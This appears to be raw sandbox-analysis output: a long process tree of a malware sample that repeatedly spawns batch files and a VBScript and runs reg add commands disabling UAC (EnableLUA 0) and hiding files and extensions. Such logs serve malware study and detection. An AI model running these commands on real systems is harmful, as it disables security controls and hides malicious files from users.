        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        186⤵
        Modifies registry key
        
        PID:1492
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        186⤵
        
        PID:3320
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        186⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        184⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:1532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        184⤵
        
        PID:4428
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        184⤵
        
        PID:1060
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SiAEMQko.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        184⤵
        
        PID:3580
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        185⤵
        
        PID:4564
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        182⤵
        
        PID:3224
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        182⤵
        
        PID:5092
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qkUAsoQo.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        182⤵
        
        PID:668
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        183⤵
        
        PID:3540
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        182⤵
        
        PID:3920
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        180⤵
        
        PID:5068
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        181⤵
        
        PID:4772
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        180⤵
        
        PID:2800
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        180⤵
        Modifies registry key
        
        PID:1668
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        181⤵
        
        PID:3460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ucgcUEEM.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        180⤵
        
        PID:3868
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        181⤵
        
        PID:3756
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        181⤵
        
        PID:1500
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        178⤵
        
        PID:3108
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        179⤵
        
        PID:4516
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        178⤵
        
        PID:1584
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        178⤵
        
        PID:772
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ViAUkEgE.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        178⤵
        
        PID:4148
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        179⤵
        
        PID:1432
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wiAUwgQc.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        176⤵
        
        PID:4340
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        177⤵
        
        PID:1060
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        176⤵
        
        PID:3764
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        176⤵
        
        PID:3744
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        176⤵
        Modifies registry key
        
        PID:3752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aQwwEscs.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        174⤵
        
        PID:4924
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        175⤵
        
        PID:3300
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        174⤵
        
        PID:2308
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        174⤵
        
        PID:2192
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        174⤵
        
        PID:4448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DeMYkwgU.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        172⤵
        
        PID:4804
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        173⤵
        
        PID:4748
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        172⤵
        
        PID:3124
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        172⤵
        
        PID:1432
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        172⤵
        
        PID:1724
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pockAQcw.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        170⤵
        
        PID:5044
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        171⤵
        
        PID:4644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        170⤵
        Modifies registry key
        
        PID:4848
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        171⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        170⤵
        
        PID:3544
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        170⤵
        
        PID:3308
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        168⤵
        
        PID:2260
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        168⤵
        
        PID:3496
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        168⤵
        
        PID:1464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OwwwEEoQ.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        168⤵
        
        PID:3540
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        169⤵
        
        PID:4740
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        166⤵
        
        PID:4616
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        166⤵
        Modifies registry key
        
        PID:2596
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        167⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AGIIAYEo.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        166⤵
        
        PID:4596
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        167⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        166⤵
        Modifies registry key
        
        PID:1044
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tikwwwMc.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        164⤵
        
        PID:3680
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        165⤵
        
        PID:4508
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        164⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        164⤵
        
        PID:1460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        164⤵
        
        PID:4932
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        162⤵
        
        PID:4040
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        162⤵
        Modifies registry key
        
        PID:4076
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        162⤵
        
        PID:220
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GkYEMYwU.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        162⤵
        
        PID:4320
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        163⤵
        
        PID:1596
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        163⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:1360
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\psoUIMoU.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        160⤵
        
        PID:1212
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        161⤵
        
        PID:684
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        161⤵
        
        PID:2528
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        160⤵
        
        PID:3956
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        160⤵
        
        PID:3052
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        160⤵
        
        PID:1428
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        161⤵
        UAC bypass
        
        PID:4252
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xWUQcIcs.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        158⤵
        
        PID:368
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        159⤵
        
        PID:3500
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        158⤵
        
        PID:3904
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        158⤵
        
        PID:2184
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        158⤵
        Modifies registry key
        
        PID:644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        156⤵
        
        PID:2592
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hQoUAkIk.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        156⤵
        
        PID:4652
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        157⤵
        
        PID:4004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        156⤵
        
        PID:5092
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        156⤵
        
        PID:4380
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        155⤵
        
        PID:1584
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fUwggIYI.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        154⤵
        
        PID:3096
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        155⤵
        
        PID:4464
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        155⤵
        Modifies visibility of file extensions in Explorer
        Checks whether UAC is enabled
        System policy modification
        
        PID:1120
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        154⤵
        Modifies registry key
        
        PID:3168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        154⤵
        
        PID:4028
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        154⤵
        
        PID:1420
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FogwMkcw.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        152⤵
        
        PID:2852
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        153⤵
        
        PID:2616
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        152⤵
        
        PID:2936
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        152⤵
        
        PID:1060
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        153⤵
        
        PID:2568
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        152⤵
        UAC bypass
        
        PID:4188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        150⤵
        
        PID:1360
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        151⤵
        
        PID:4960
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wuUoYgYA.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        150⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        151⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        150⤵
        
        PID:4896
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        150⤵
        
        PID:408
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        148⤵
        Modifies registry key
        
        PID:4952
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\poYcswoE.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        148⤵
        
        PID:4812
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        149⤵
        
        PID:4076
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        149⤵
        
        PID:4468
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        148⤵
        UAC bypass
        
        PID:208
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        148⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4612
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SwUQcsMw.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        146⤵
        
        PID:4984
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        147⤵
        
        PID:436
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        147⤵
        
        PID:3576
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        146⤵
        
        PID:4648
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        146⤵
        Modifies registry key
        
        PID:368
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        146⤵
        
        PID:2184
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SgAMIQwI.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        144⤵
        
        PID:4468
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        145⤵
        
        PID:2568
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        144⤵
        
        PID:4912
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        144⤵
        
        PID:2148
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        144⤵
        
        PID:988
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        142⤵
        
        PID:3784
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        142⤵
        Modifies registry key
        
        PID:1460
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        143⤵
        
        PID:3524
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fuwgEEgQ.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        142⤵
        
        PID:4756
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        143⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        142⤵
        
        PID:3764
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        140⤵
        
        PID:448
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        141⤵
        
        PID:3676
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        140⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        140⤵
        
        PID:4728
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        141⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cockEUok.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        140⤵
        
        PID:3960
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        141⤵
        
        PID:2872
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        138⤵
        Modifies registry key
        
        PID:4028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ukgEIgUk.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        138⤵
        
        PID:3092
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        139⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        138⤵
        
        PID:3300
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        138⤵
        
        PID:3392
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        136⤵
        Modifies registry key
        
        PID:4000
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cQYIMgws.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        136⤵
        
        PID:4812
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        137⤵
        
        PID:396
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        136⤵
        Modifies registry key
        
        PID:4992
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        136⤵
        
        PID:3544
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xQEgAwIk.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        134⤵
        
        PID:3484
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        135⤵
        
        PID:4804
        
